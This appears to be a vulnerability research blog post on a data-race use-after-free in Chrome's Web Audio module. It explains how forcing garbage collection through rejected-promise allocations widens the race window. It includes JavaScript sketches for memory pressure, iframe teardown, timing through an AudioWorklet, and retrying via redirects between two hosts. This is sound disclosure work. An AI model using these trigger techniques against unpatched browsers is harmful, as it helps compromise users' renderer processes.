Triggering garbage collection with rejected promises to cause use-after-free in Chrome

In this post I’ll show how garbage collection (GC) in Chrome can be triggered by small memory allocations in unexpected places, a technique I then used to trigger a use-after-free bug.


In this post and the next we’ll review the details of some use-after-free bugs that I found in the Web Audio module in Google Chrome. Although the vulnerabilities are found in Web Audio, the way they’re triggered involves more general techniques, which will be the focus of these posts.

More specifically, we’ll review a use-after-free that’s triggered by a data race, along with how to trigger it using some internals of the garbage collector. While the bug is fairly hard to exploit, the way to trigger it is interesting.

Web Audio

The vulnerability is found in the Web Audio module in Blink, which runs in the renderer process and is therefore sandboxed. It is the implementation of the Web Audio API in Chrome. In October 2019, Anton Ivanov and Alexey Kulaev at Kaspersky reported a vulnerability in this module that was exploited in the wild. Since then, Sergei Glazunov of Google Project Zero has carried out variant analysis using CodeQL and discovered three variants of this bug (see also Maddie Stone’s presentation at BlueHat IL for more background).

I’ll now go through some Web Audio concepts that are required to understand the issues covered in this and the next post. It will help to first familiarize yourself with Web Audio’s basic concepts, documented here.

BaseAudioContext, AudioNode and AudioHandler

BaseAudioContext is Blink’s implementation of the BaseAudioContext interface of the Web Audio API. It provides the rendering context for creating AudioNode objects, which are used to build graphs that process audio input. For more information, review the concepts behind the Web Audio API.

AudioNode provides an interface to JavaScript and delegates its operations to AudioHandler. Each AudioNode holds the AudioHandler responsible for its implementation as a scoped_refptr, thereby keeping it alive. An AudioNode also holds the BaseAudioContext that it was created in as a Member, meaning that a BaseAudioContext cannot be garbage collected until all AudioNode objects it created are garbage collected.
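
To put these objects in context, here is roughly how they come into being from JavaScript. This is only a minimal sketch for orientation (not part of the proof of concept): every node created below is an AudioNode backed by an AudioHandler, and each node keeps a reference to the OfflineAudioContext it was created in.

// Minimal sketch: an OfflineAudioContext (a BaseAudioContext) and a couple of
// AudioNodes. Each JS-visible node delegates its processing to an internal
// AudioHandler and holds its context as a Member.
const ctx = new OfflineAudioContext(1, 44100, 44100);  // 1 channel, 1 second

const osc = ctx.createOscillator();  // AudioNode backed by an AudioHandler
const gain = ctx.createGain();       // likewise

// ctx.destination is the special AudioDestinationNode held by the context.
osc.connect(gain).connect(ctx.destination);

osc.start();
ctx.startRendering().then((buffer) => {
  // Rendering pulls on the graph backwards from the destination node.
  console.log("rendered", buffer.length, "frames");
});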

Rendering graph pulling and ownership transfer of AudioHandler

Each BaseAudioContext holds, as a Member, a special AudioNode that is derived from AudioDestinationNode. This node implements the methods needed to traverse the audio graph and render the audio input. For example, the OfflineAudioContext implements it in the DoOfflineRendering method.

During rendering, if an AudioNode gets garbage collected, the AudioHandler used for rendering may be deleted and cause use-after-free bugs, such as what happened in this issue. To prevent such vulnerabilities, when an AudioNode gets garbage collected (which happens on the main thread) while rendering is happening on the audio thread, it transfers ownership of its AudioHandler to the DeferredTaskHandler, which keeps the handler alive until the current rendering unit (quantum) is done. These orphan handlers are cleared out either at the end of the quantum, when RequestToDeleteHandlersOnMainThread is called, or when ClearHandlersToBeDeleted is called because the execution context (e.g. webpage, iframe, etc.) is destroyed. Both of these clear out rendering_orphan_handlers_ and may delete the AudioHandler whose ownership was transferred to it.

GraphAutoLocker and tear_down_mutex_

As AudioHandler objects are often accessed on the audio thread while they are destroyed on the main thread, care must be taken to prevent them from being accessed while the main thread is trying to destroy them. This is usually done using the GraphAutoLocker and the more recently introduced tear_down_mutex_. Access to AudioHandler objects on the audio thread must be protected by one of these locks to prevent a use-after-free caused by a data race. There are also other, more fine-grained locks that are specific to some nodes, such as the process_lock_ that is relevant to the issues found by Anton Ivanov and Alexey Kulaev (at Kaspersky) and Sergei Glazunov of Google Project Zero mentioned in the introduction.

The vulnerability

The current issue is a use-after-free caused by a data race where access to an AudioHandler isn’t protected. It’s fairly easy to trigger on the master branch at the time of the report (@f440b57), where the tear_down_mutex_ has been removed, but triggering it on the release branch (80.0.3987.132) is a lot more interesting, and that is what we’ll review first.

On 80.0.3987.132, the rendering method in OfflineAudioDestinationNode contains the following code:

  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

      // This will cause the node(s) connected to us to process, which in turn
      // will pull on their input(s), all the way backwards through the
      // rendering graph.
      AudioBus* rendered_bus = Input(0).Pull(destination_bus, number_of_frames);

      if (!rendered_bus) {
        destination_bus->Zero();
      } else if (rendered_bus != destination_bus) {
        // in-place processing was not possible - so copy
        destination_bus->CopyFrom(*rendered_bus);
      }
    } else {
      destination_bus->Zero();
    }

    // Process nodes which need a little extra help because they are not
    // connected to anything, but still need to process.
    Context()->GetDeferredTaskHandler().ProcessAutomaticPullNodes(            //<--- Only protected if try_locker succeeded
        number_of_frames);
  }

Note that the above snippet tries to acquire the tear down lock and, if it succeeds, performs Input(0).Pull(...). However, ProcessAutomaticPullNodes is performed regardless of whether the lock was acquired successfully. Inside the ProcessAutomaticPullNodes method, the AudioHandler objects in rendering_automatic_pull_handlers_ are accessed:

void DeferredTaskHandler::ProcessAutomaticPullNodes(
    uint32_t frames_to_process) {
  DCHECK(IsAudioThread());

  for (unsigned i = 0; i < rendering_automatic_pull_handlers_.size(); ++i) {
    rendering_automatic_pull_handlers_[i]->ProcessIfNecessary(
        frames_to_process);
  }
}

If the audio thread fails to acquire the tear down lock, then access to rendering_automatic_pull_handlers_ is not protected. While this looks like a candidate for a data race, let’s take a look at what it takes to get a use-after-free bug out of it. The rendering_automatic_pull_handlers_ list gets updated every time DeferredTaskHandler::UpdateAutomaticPullNodes is called, which happens when HandlePreRenderTasks is called, right before the audio thread tries to acquire the tear down lock:

  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {      //<--- Updates `rendering_automatic_pull_handlers_`
    SuspendOfflineRendering();
    return true;
  }

  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

This update is protected by the graph lock.
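
As an aside, rendering_automatic_pull_handlers_ holds the handlers of nodes registered as automatic pull nodes, i.e. nodes that are not connected to the destination but still need to be processed. As far as I can tell, an AnalyserNode whose output is left unconnected is one way to get a handler into this list from JavaScript; the following is only a hedged sketch, and the choice of node is my assumption rather than something spelled out above:

// Sketch (assumption): an AnalyserNode that has an input connected but no
// output connection is registered as an automatic pull node, so its handler
// ends up in rendering_automatic_pull_handlers_ during rendering.
const ctx = new OfflineAudioContext(1, 44100, 44100);
const source = ctx.createConstantSource();
const analyser = ctx.createAnalyser();

source.connect(analyser);   // input connected...
// ...but analyser is not connected to ctx.destination, so it has to be
// pulled by DeferredTaskHandler::ProcessAutomaticPullNodes.
source.start();
ctx.startRendering();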

This update in HandlePreRenderTasks means that any change to the graph, such as the destruction of the AudioNode needed to trigger a use-after-free, must happen after Context()->HandlePreRenderTasks is called (or at least after rendering_automatic_pull_handlers_ is updated there); otherwise the AudioHandler will simply be removed from rendering_automatic_pull_handlers_ and never be used again.

In order to cause a use-after-free in ProcessAutomaticPullNodes, we first need to destroy the AudioNode objects that hold the AudioHandler objects in rendering_automatic_pull_handlers_. This requires a garbage collection of these AudioNode objects to happen after rendering_automatic_pull_handlers_ is updated on the audio thread. As garbage collection calls AudioNode::Dispose, which is protected by the graph lock, this can only happen after HandlePreRenderTasks has completed. However, this is still not enough to destroy the AudioHandler: because this is happening during audio rendering, the AudioNode transfers ownership of its AudioHandler to rendering_orphan_handlers_ in the DeferredTaskHandler, which means that from this point on, both rendering_orphan_handlers_ and rendering_automatic_pull_handlers_ are responsible for keeping these handlers alive. Both of them are cleared when ClearHandlersToBeDeleted is called:

void DeferredTaskHandler::ClearHandlersToBeDeleted() {
  DCHECK(IsMainThread());
  GraphAutoLocker locker(*this);
  tail_processing_handlers_.clear();
  rendering_orphan_handlers_.clear();
  deletable_orphan_handlers_.clear();
  automatic_pull_handlers_.clear();
  rendering_automatic_pull_handlers_.clear();
  active_source_handlers_.clear();
}

As rendering_automatic_pull_handlers_ is cleared last, calling ProcessAutomaticPullNodes on the audio thread while rendering_automatic_pull_handlers_ is being cleared may cause a use-after-free bug.

Causing an unprotected access in ProcessAutomaticPullNodes, on the other hand, requires the audio thread to fail to acquire the tear down lock. This means that the BaseAudioContext::Uninitialize method must be called before the audio thread tries to acquire the lock, and this call will also invoke ClearHandlersToBeDeleted to clear out the handlers.

The following figure shows the order of events that needs to happen in both the main thread and the audio thread.

[Figure: race window]

This means that on the main thread, a GC cycle needs to be started and completed, and then the execution context needs to be destroyed and BaseAudioContext::Uninitialize called, all between the end of HandlePreRenderTasks and the attempt to acquire Context()->GetTearDownMutex():

  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
  ...
  // Destruction window: GC needs to complete here, followed by a call to BaseAudioContext::Uninitialize.
  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

Unless there is a way to make the two threads run at significantly different speeds, it is impossible to fit all of this into such a tight window. If anyone does know how to do that, please feel free to reach out, as I’d be very interested to learn.

Triggering GC in BaseAudioContext::Uninitialize

Another idea is to see whether there is any way to trigger GC inside the BaseAudioContext::Uninitialize method, before ClearHandlersToBeDeleted is called. That way, we only need to time things so that BaseAudioContext::Uninitialize is called before the audio thread gets hold of the tear down lock, which is not difficult. As it turns out, BaseAudioContext::Uninitialize calls RejectPendingResolvers, which rejects all the unresolved promises, before ClearHandlersToBeDeleted is called. In the OfflineAudioContext, this allocates a DOMException for each unresolved promise:

void OfflineAudioContext::RejectPendingResolvers() {
  ...
  for (auto& pending_suspend_resolver : scheduled_suspends_) {
    pending_suspend_resolver.value->Reject(MakeGarbageCollected<DOMException>(
        DOMExceptionCode::kInvalidStateError, "Audio context is going away"));   //<--- Allocates GCed objects
  }
  ...
}

Allocating with MakeGarbageCollected causes memory pressure and can potentially trigger a garbage collection. Trying to trigger GC using unresolved promises alone, however, is fairly difficult: DOMException objects are small, and it would take a prohibitively large number of promises to trigger GC. We therefore need to build up memory pressure beforehand.
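
For reference, the scheduled_suspends_ map corresponds, as far as I understand it, to pending promises created by OfflineAudioContext.suspend(). A rough sketch of how a batch of unresolved suspend promises could be queued up from JavaScript (the counts and times here are arbitrary):

// Sketch: queue unresolved suspend() promises on an OfflineAudioContext.
// Each call adds an entry to scheduled_suspends_; when the execution context
// is destroyed, RejectPendingResolvers rejects them all, allocating a
// DOMException for each one.
const ctx = new OfflineAudioContext(1, 10 * 44100, 44100);

for (let i = 1; i <= 1000; i++) {
  // Suspend at distinct render quantum boundaries and never call resume(),
  // so the promises stay unresolved until the context is torn down.
  ctx.suspend(i * 128 / 44100).catch(() => {});
}

ctx.startRendering();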

When a GarbageCollected (on-heap) object is allocated, AllocateObject first tries to allocate the memory from existing free space that it manages; failing that, it goes to OutOfLineAllocate to obtain some new free space and then allocate the object. After the object is allocated, OutOfLineAllocate calls AllocatedObjectSizeSafepoint, which, through a series of calls, reaches EmbedderHeapTracer::IncreaseAllocatedSize and then LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded.

void LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded() {
  if (!FLAG_global_gc_scheduling || !FLAG_incremental_marking) return;

  Heap* heap = isolate_->heap();
  heap->StartIncrementalMarkingIfAllocationLimitIsReached(
      heap->GCFlagsForIncrementalMarking(),
      kGCCallbackScheduleIdleGarbageCollection);
  if (heap->AllocationLimitOvershotByLargeMargin()) {
    heap->FinalizeIncrementalMarkingAtomically(           //<--- Triggers a full GC
        i::GarbageCollectionReason::kExternalFinalize);
  }
}

At this point, if the heap->AllocationLimitOvershotByLargeMargin() check passes, a full GC is triggered, collecting objects in both the old space and the young space. This check essentially looks at how much memory is already allocated (but not yet collected) and by how much it exceeds some threshold. The ‘overshoot’ value here is not just the size of the current allocation, but also memory that has been allocated previously and not yet freed or collected. Once the overshoot value is high enough, a full GC is triggered, after which both the allocated value and the threshold are adjusted. Because the overshoot value takes into account all the memory that is currently allocated, by carefully controlling how much memory we allocate beforehand we can trigger GC even with a small memory allocation, such as the DOMException allocations in RejectPendingResolvers.

Getting the timing right

After some experimentation, I managed to trigger GC during RejectPendingResolvers, but only when I allocated a large amount of memory right before destroying the execution context. In my case, the sequence looks like this:

  // Prepare memory pressure by keeping a large amount of memory alive.
  let arr = [];
  for (let i = 0; i < 180; i++) {
    arr[i] = new Array(1024 * 1024);
    arr[i].fill(1);
  }
  let frame = document.getElementById("ifrm");
  // Trigger BaseAudioContext::Uninitialize and then GC within it.
  frame.parentNode.removeChild(frame);

This removes an iframe that contains the relevant BaseAudioContext, AudioHandler, etc. What then happens on the different threads is the following:

[Figure: threads]

The main problem with a large allocation is that it’s difficult to land both BaseAudioContext::Uninitialize and ClearHandlersToBeDeleted in the right place, because any small fluctuation in the allocation time causes big differences in the overall timing.

To control the timing, I use an AudioWorkletNode. As this node processes audio with a user-supplied function, I can use it to control the timing on the audio thread (a sketch of such a processor is shown at the end of this section). By giving the AudioWorkletNode a delay that is roughly the time between BaseAudioContext::Uninitialize and ClearHandlersToBeDeleted, I can get ClearHandlersToBeDeleted to run concurrently with ProcessAutomaticPullNodes, provided I can get BaseAudioContext::Uninitialize to land in this window:

  if (!IsInitialized()) {
    destination_bus->Zero();
    return false;
  }
  //Window start to trigger `BaseAudioContext::Uninitialize`
  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
    SuspendOfflineRendering();
    return true;
  }
  //Window end to trigger `BaseAudioContext::Uninitialize`
  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());

For a component build, which is mostly used during development to speed up build times, the tear down lock conveniently synchronizes the two threads: BaseAudioContext::Uninitialize lands while the AudioWorkletNode is processing, and then has to wait for the tear down lock to be released before it can continue, so it is effectively triggered at the moment the lock is released. This is fairly consistent relative to the rendering quantum, and, as it turns out, BaseAudioContext::Uninitialize then also lands in the appropriate window in the next rendering quantum. This makes it easy to control the timing and trigger the bug. On a non-component build, although the tear down lock still synchronizes the threads in the same way, BaseAudioContext::Uninitialize triggers too early and misses the window. To synchronize the two threads there, you would probably need to use currentFrame in the AudioWorkletProcessor, which is accessible from both the audio and main threads, to get the timing right. I believe this is doable, but rather tedious, and I haven’t actually tried it myself.
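
For completeness, here is roughly what such a delay-inducing AudioWorkletProcessor might look like. This is only a sketch: the delay value is a placeholder that would have to be tuned experimentally, and the currentFrame-based synchronization mentioned above is not implemented.

// delay-processor.js, loaded with ctx.audioWorklet.addModule(...) and used
// via new AudioWorkletNode(ctx, 'delay-processor'). Sketch only.
class DelayProcessor extends AudioWorkletProcessor {
  process(inputs, outputs, parameters) {
    // Busy-wait for roughly DELAY_MS each render quantum. This stalls the
    // audio thread while it holds the tear down lock, which is what lines up
    // BaseAudioContext::Uninitialize on the main thread.
    const DELAY_MS = 5;  // placeholder; found by experiment
    const start = Date.now();
    while (Date.now() - start < DELAY_MS) {}
    // currentFrame (from AudioWorkletGlobalScope) could be posted back to the
    // main thread via this.port to synchronize the two threads more precisely.
    return true;
  }
}
registerProcessor('delay-processor', DelayProcessor);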

Getting reliability through unlimited retries

As the data race relies on getting the timing right, it may require multiple tries to trigger. Normally, this could be done by reloading the page. However, a reload does not reset the allocation threshold, which is crucial for triggering GC in the right place, so reloading the page doesn’t work in this case. Instead, it can be done by setting up two different hosts that serve the same pages and have them redirect to one another, essentially reloading the page from a different host. That way, a new renderer is used to load the page each time, resetting the state of the allocation threshold (among other things). This means the bug would likely be triggered with just a single click that launches the page, after enough retries, as sketched below.
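
A rough sketch of this retry logic, assuming the proof of concept is mirrored on two hypothetical hosts a.example and b.example:

// Sketch of the retry logic, served identically from two hosts
// (a.example and b.example are hypothetical). If the bug did not trigger
// within some time budget, bounce to the other host so a fresh renderer,
// with a fresh allocation threshold, retries the whole sequence.
const OTHER_HOST = location.host === 'a.example' ? 'b.example' : 'a.example';

function retryFromOtherHost() {
  location.href = `https://${OTHER_HOST}${location.pathname}${location.search}`;
}

// Give the current attempt a fixed time budget; if the renderer is still
// alive after that, assume the race was missed and retry.
setTimeout(retryFromOtherHost, 3000);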
